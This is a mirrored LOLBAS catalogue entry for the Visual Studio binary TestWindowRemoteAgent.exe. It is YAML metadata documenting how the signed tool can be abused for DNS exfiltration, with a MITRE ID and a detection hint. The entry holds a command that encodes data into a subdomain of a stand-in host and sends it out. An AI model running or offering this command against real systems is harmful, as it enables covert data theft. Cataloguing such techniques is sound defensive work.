mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-31 17:18:23 +01:00
c65c9545f5
This one is pretty straightforward and related to the vstest so pushed the commit for this pull request. TestWindowRemoteAgent.exe is a signed DLL that can be utilized to be a gadget for data exfiltration since it tries connection to any host.
19 lines
815 B
YAML
19 lines
815 B
YAML
---
|
|
Name: TestWindowRemoteAgent.exe
|
|
Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
|
|
Author: Onat Uzunyayla
|
|
Created: 2023-21-08
|
|
Commands:
|
|
- Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
|
|
Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
|
|
Usecase: Attackers may utilize this to exfiltrate data over DNS
|
|
Category: Data Exfiltration
|
|
Privileges: User
|
|
MitreID: T1048
|
|
OperatingSystem: Windows 10, Windows 11
|
|
Full_Path:
|
|
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
|
|
Detection:
|
|
- IOC: TestWindowRemoteAgent.exe spawning unexpectedly
|
|
Acknowledgement:
|
|
- Person: Onat Uzunyayla |